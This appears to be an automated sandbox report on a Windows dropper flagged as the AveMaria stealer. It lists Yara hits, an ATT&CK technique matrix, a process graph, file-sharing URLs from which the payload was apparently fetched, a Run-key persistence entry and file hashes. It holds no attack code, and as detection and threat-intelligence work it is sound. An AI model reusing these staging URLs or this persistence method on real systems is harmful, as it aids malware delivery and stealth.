              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Yara detected AveMaria stealer
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe PID: 5016, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected AveMaria stealer
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              PowerShell              		1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Masquerading              		11
              Input Capture              		11
              Security Software Discovery              		Remote Services11
              Input Capture              		Exfiltration Over Other Network Medium11
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		Exfiltration Over Bluetooth1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer13
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Hidden Users              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items2
              Obfuscated Files or Information              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
              Software Packing              		Proc Filesystem12
              System Information Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756122 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 38 s23.filetransfer.io 2->38 40 filetransfer.io 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 8 other signatures 2->52 8 SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe 16 6 2->8         started        signatures3 process4 dnsIp5 42 filetransfer.io 188.114.96.3, 443, 49695, 49696 CLOUDFLARENETUS European Union 8->42 44 s23.filetransfer.io 188.114.97.3, 443, 49697, 49700 CLOUDFLARENETUS European Union 8->44 34 C:\Users\user\AppData\...\Mqombsglp.exe, PE32 8->34 dropped 36 C:\Users\...\Mqombsglp.exe:Zone.Identifier, ASCII 8->36 dropped 54 Encrypted powershell cmdline option found 8->54 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 powershell.exe 16 8->18         started        20 powershell.exe 9 8->20         started        file6 signatures7 process8 signatures9 56 Uses ipconfig to lookup or modify the Windows network settings 13->56 22 conhost.exe 13->22         started        24 ipconfig.exe 1 13->24         started        26 conhost.exe 16->26         started        28 ipconfig.exe 1 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe100%AviraTR/Dropper.Gen
              SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe38%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack100%AviraHEUR/AGEN.1202479Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://www.microsoft.co0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              https://s23.filetransfer.io/storage/download/EmFT04AdCdjg0%Avira URL Cloudsafe
              https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK0%Avira URL Cloudsafe
              http://filetransfer.io0%Avira URL Cloudsafe
              https://filetransfer.io/data-package/XK4aNvBX/download0%Avira URL Cloudsafe
              http://filetransfer.io/data-package/XK4aNvBX/download0%Avira URL Cloudsafe
              62.102.148.1580%Avira URL Cloudsafe
              https://filetransfer.io40%Avira URL Cloudsafe
              https://s23.filetransfer.io40%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              filetransfer.io
              		188.114.96.3
              		truefalse
                		unknown
                s23.filetransfer.io
                		188.114.97.3
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://s23.filetransfer.io/storage/download/EmFT04AdCdjgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  62.102.148.158true
                  • Avira URL Cloud: safe
                  		unknown
                  https://s23.filetransfer.io/storage/download/1tQUp1sCtsBKfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://filetransfer.io/data-package/XK4aNvBX/downloadfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://filetransfer.io/data-package/XK4aNvBX/downloadfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://filetransfer.io4SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsoftpowershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.newtonsoft.com/jsonschemaSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          http://www.microsoft.copowershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.nuget.org/packages/Newtonsoft.Json.BsonSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            http://filetransfer.ioSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/syohex/java-simple-mine-sweeperC:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://james.newtonking.com/projects/jsonSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://s23.filetransfer.io4SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  188.114.97.3
                                  		s23.filetransfer.ioEuropean Union
                                  		13335CLOUDFLARENETUSfalse
                                  188.114.96.3
                                  		filetransfer.ioEuropean Union
                                  		13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:756122
                                  Start date and time:2022-11-29 16:53:32 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 10m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@17/8@6/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                  • TCP Packets have been reduced to 100
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  16:55:01API Interceptor74x Sleep call for process: powershell.exe modified
                                  16:56:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"
                                  16:56:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):5829
                                  Entropy (8bit):4.902247628650607
                                  Encrypted:false
                                  SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                  MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                  SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                  SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                  SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                  Malicious:false
                                  Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15676
                                  Entropy (8bit):5.553114530083217
                                  Encrypted:false
                                  SSDEEP:384:Kte/UYhZPTRDNaSjnyulPsFvI1vs4oaYP:3h5lsoyul0CSBP
                                  MD5:7A2B1C5C62100A3062D423C48A2C2F52
                                  SHA1:18978F9AF89F2C877AE26A5529B8D3644C0ED353
                                  SHA-256:05C941DB1B395E6EA1839E3913ED1702C73AFF477556387D1E536A94A78B9FC1
                                  SHA-512:3A80C4A3539187AFBE7EE18C1BCA045B862A7BB069EB71DF2F5EF4ADD7168F12352BF5F8D8BAE987A686BE82E1BD7E2DA64293CC0F72CDEBE027FF3F31874242
                                  Malicious:false
                                  Preview:@...e...........9.........b.{.o.G.....g..............@..........H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gpqv23h.beb.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0etdcxs.mxn.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhdrfzpc.o2h.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcybgzu0.gku.psm1

                                  Download File
